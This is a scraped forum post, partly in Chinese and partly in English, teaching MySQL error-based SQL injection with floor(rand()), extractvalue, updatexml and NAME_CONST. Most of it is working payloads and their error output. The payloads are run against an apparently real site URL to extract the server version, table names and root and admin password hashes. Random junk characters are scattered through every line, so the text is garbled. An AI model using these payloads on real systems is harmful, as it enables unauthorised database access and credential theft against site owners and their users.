1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
/ h( o- ~; `0 |/ X g6 D首先进行正常查询: mysql> select * from article where id = 1;
) r9 Q3 f6 h; \2 i5 J3 }: y6 |+—-+——-+———+
% u7 {3 z v P& w6 q; Z| id | title | content |
' u) f7 W- c5 C- ~: M# A$ Y% z; u+ ~+—-+——-+———+9 \% N* m9 |% @/ n1 _& i/ ]" n
| 1 | test | do it |+ ~! r* J! o2 I* ~& U8 d9 Q
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
. j/ `$ u+ Q" I9 vERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
$ b' C, K+ h% |! l" ~/ g" Q例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);, C* p. B% @) U6 B: h3 \# }
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));0 x* V+ n$ o0 A2 T* z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
/ |/ N" d0 t. N) u6 H/ C测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
- H3 ~+ |" j7 [0 N0 OERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ' |* X/ ^9 m) i, V, N* E/ W2 F( u
$ ]. G4 T' C: G8 Y, v; j+ B1 o再收集: + J. M1 I7 B) F' _' D) _
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 7 l% h' l! q; G& ^4 {$ |2 H$ w: g
9 G% h7 u4 a, _Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
: a% A( V$ T8 e. I0 M- M! t1 B7 d
! ]/ h8 s' ]3 l& P& Fhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)' M- z+ D# U% W, r4 o3 i$ A$ h
5 D( o# w; ?$ l# M% [3 rErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 7 e0 J9 _9 T' o- z U( T
8 _9 j# V" T' ^$ o
MYSQL高版本报错注入技巧-利用NAME_CONST注入
4 h; A' t+ _0 J$ H, n* bIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 9 H7 M% T6 s9 `0 J7 c/ q5 l
, @$ {8 }; R: W H3 N$ U7 f* J
+ A( h7 X2 z& H9 P相关信息4 o" H" z: I( M3 D" R
. {* B1 O! K: `, Z( @NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.+ `& |$ M9 m( b V
( W' I. Y+ [8 A$ o' y4 X% S
Code:& I3 }5 o. G9 A1 K: Z6 b
NAME_CONST(DATA, VALUE)
2 v" L* K) @! z8 i( v8 @" X- `" A, O% `0 u
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.& q8 |/ z) \8 E& [$ m% E, R, b
/ V6 S. [8 t. I- N
SELECT NAME_CONST('TEST', 1)
9 C6 j+ h; r5 R+ z5 {
) |- M, L+ b x% O. g+ V6 c0 t, C+ t0 t3 _" E7 J
0 {! |( @! U2 U" {. C5 m1 L; A|---------------|
5 z( n% k: I$ u2 K' \& u| TEST |9 m2 e! O h S
| |
# f4 ~' T* G* @$ o1 N; u|---------------|7 G% Y, g4 O8 ?' |
| 1 |
7 j. T ^! T! \0 F" w! P% t| |" Q% Z" W! N0 S1 A# G3 M
|---------------|
2 R+ @2 u: {( Z9 g' S/ k# F: Q' D) S8 {2 z
% l$ [2 e7 |% Q, ^
% a! D# k& M. K) e a3 ~
. h4 P( J0 u% c% m1 D& chttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
* {* V1 \( I1 ^6 ?Intro to MySQL Variables' l$ n5 W6 H" P: V6 r4 j) y e4 T* |
3 d/ Y# \; E9 L9 d8 H7 A: TOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
3 Z! s* o5 ~, H2 f- R9 q) f- Z8 A/ h+ ^! k" t
Code:3 [ i/ y4 A; i2 c2 ]
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261 b/ `8 {, [2 L% j
& n1 l# T4 G: j1 o
1 h: R/ H ]3 K( X
7 ]7 y! w' d: D+ m" H+ ~' W _3 A7 i! L3 L- ]) Z
3 i4 k2 @& Q. v2 q0 I0 | f
Code:
: W+ r/ z% g! ~2 Y) Q) U& Cand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
* M# z: [* Q; E! N( D
% U, ?0 ]0 ^, J9 g1 T$ Z) C! u2 ~! F
( x- p# N& J0 VVAR = Your MySQL variable.3 `6 |1 e* Y9 L! E
+ r) H! S/ w/ }3 F
MySQL 5.1.3 Server System Variables4 {7 u6 I, D& q2 P+ R @1 }
% M9 P- w g; i1 R N
Let's try it out on my site..
2 ]8 Z- X$ [# D( B
9 S: o4 L! O) l7 e ?7 N& VCode:
6 S9 k( V4 | Bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--5 s& f' f8 o- L- x% k/ q7 p2 p4 ?! G* P
2 G$ j: _" H2 w b
Erroruplicate column name '5.0.27-community-nt'
4 y7 i" b. K3 D; G3 e# `$ C, |9 s4 G& I+ J% o8 R- S m
7 E- I- e4 Z/ v$ p9 G- e: ^. _ w+ J/ {+ ]! b& t F. _
" R7 N- K& Z3 f! T& o7 q) Q; c& N" f1 H7 v8 A5 y* B
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
' g4 S; u( F# Y; ]
+ @4 @. k4 ]& Q9 o0 oData Extraction- d* w; \% H& r/ U0 W: u! V
( [' _' W8 s# j8 j4 f
Code:
- o: k, ]5 r4 i3 y8 \# c+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
# |9 b9 @* ~# I% a d6 v. |* c- r3 I2 r
3 h8 D# P* X6 g6 ^We should get a duplicate column 1 error...
, }( j" {- c6 N/ s' J9 f1 ^
' |! o; m9 b+ xCode:
7 K% u. g- G8 P) U3 Vhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
# m, q1 _$ s7 y
& F' w* u) y+ v8 t2 W# e, HErroruplicate column name '1# ?: @, H6 M! z+ P; U9 D6 t
, L- F0 f' U8 M& Q1 H% x) D
1 I4 l7 x: X' f
7 B9 F% `" \! F
1 q8 v4 g7 `1 L
U% A, O8 F- X' }6 Q/ D
* G2 _7 _- L5 j6 B4 N- U% nNow let's get the tables out this bitch..% T2 E3 Q; m3 U0 F K
$ W: r! r+ s" I2 V+ G
Code:+ E$ u3 l f" v( P y
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+ V/ W3 f& c6 C7 `6 p
: H, Y3 _% K0 _- Z2 ^3 N
( ?! s e1 G' PLet's see if it works here, if it does, we can go on and finish the job.
# K, M; O2 }6 a
! x9 `: ~9 t0 H8 n- J- qCode:# t% u6 i! q0 D# j3 [- V
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--" l8 i8 X; C" i0 w6 @
h& i# Z! N0 u/ y0 S4 `
4 z1 S6 J% a, o4 C% K( _- S! P/ L' ?
Erroruplicate column name 'com_admanage
+ m% O) S% |& T9 r+ d( ]* r8 u- X" H0 {$ s- n! u/ o1 F
* k. l7 X1 v' i
3 k0 v, }+ e# D- \6 f
0 b% X% E1 v$ k6 @) F+ m" o: i- D3 S1 d" Q3 R5 ^6 o' h! g* U
5 _: g/ o# \4 v
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
$ ]8 w# x2 N0 z8 g6 G) T9 |: X J0 O! \# c" X, {. v
Let's get the columns out of the user table..
% y+ `% o: C* f3 j- m0 G: B: J7 b' m; f; d
Code:
# W0 V* S) O$ F! O' `. W' k+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--' Q6 J# `, l. e6 O X' \; ~6 C2 N; t+ @
. G) d9 k, X" c4 G6 k6 {* ^9 s) J; ^4 i9 W3 r+ L
So mine looks like this, and I get the duplicate column name 'Host'.
9 G/ N7 n% ~6 W4 V" X4 j+ j* p" E1 N5 `6 s
Code:7 U: B8 v# l, p9 E. @; g
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--9 ]9 o2 V2 y7 C' d
# e5 r3 W" D) D+ h
Erroruplicate column name 'Host'
2 B4 X; } f! Z! f6 Y! d; e' C8 g1 W5 ?( P1 p7 w$ b3 e
2 d7 r3 ?8 q! H4 ]& o5 a
8 A, t! F! ]* k/ }5 R p8 g, V
+ G; \- M+ q( g9 I4 O/ C. p. J7 V+ Q2 ?# R- g& H/ }: [
! u; I5 a: z* g- o! N N8 ~0 GWoot, time to finish this bitch off.1 G- }4 ]/ M& x+ c' {" a
+ h; j: L. f8 Z5 E
Code:
5 n5 M/ X8 ~) c. V2 I" C" j+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+ b7 c7 e% a W4 R8 N7 m6 @3 ^0 q0 \, h
6 G: L) ?5 ~! r1 d' @- _# I+ J/ e7 K+ x0 z: O
So mine looks like this...9 e W: i/ i2 r4 U. X$ D' v; h; A
( e! {! B9 H2 t0 lCode:' `7 G7 g2 B- {. {% m
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--7 d6 a) W; n' [0 T' a
. ?! B0 T/ v/ K% X* N. r
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'7 \9 b+ j# D! K# q
- H/ a8 Q, [# f
6 Q" O' t' S6 j+ q) u( o / A$ W( V& T9 Y; N" s
+ r! c! _: y9 h0 U
$ [" ^3 z+ L$ D# q6 f, Z+ b/ o. k4 M0 |+ b) l* f
And there we have it, thanks for reading.
4 ` r' o. b$ I* s! P( Q M7 T, y+ l( O9 u
|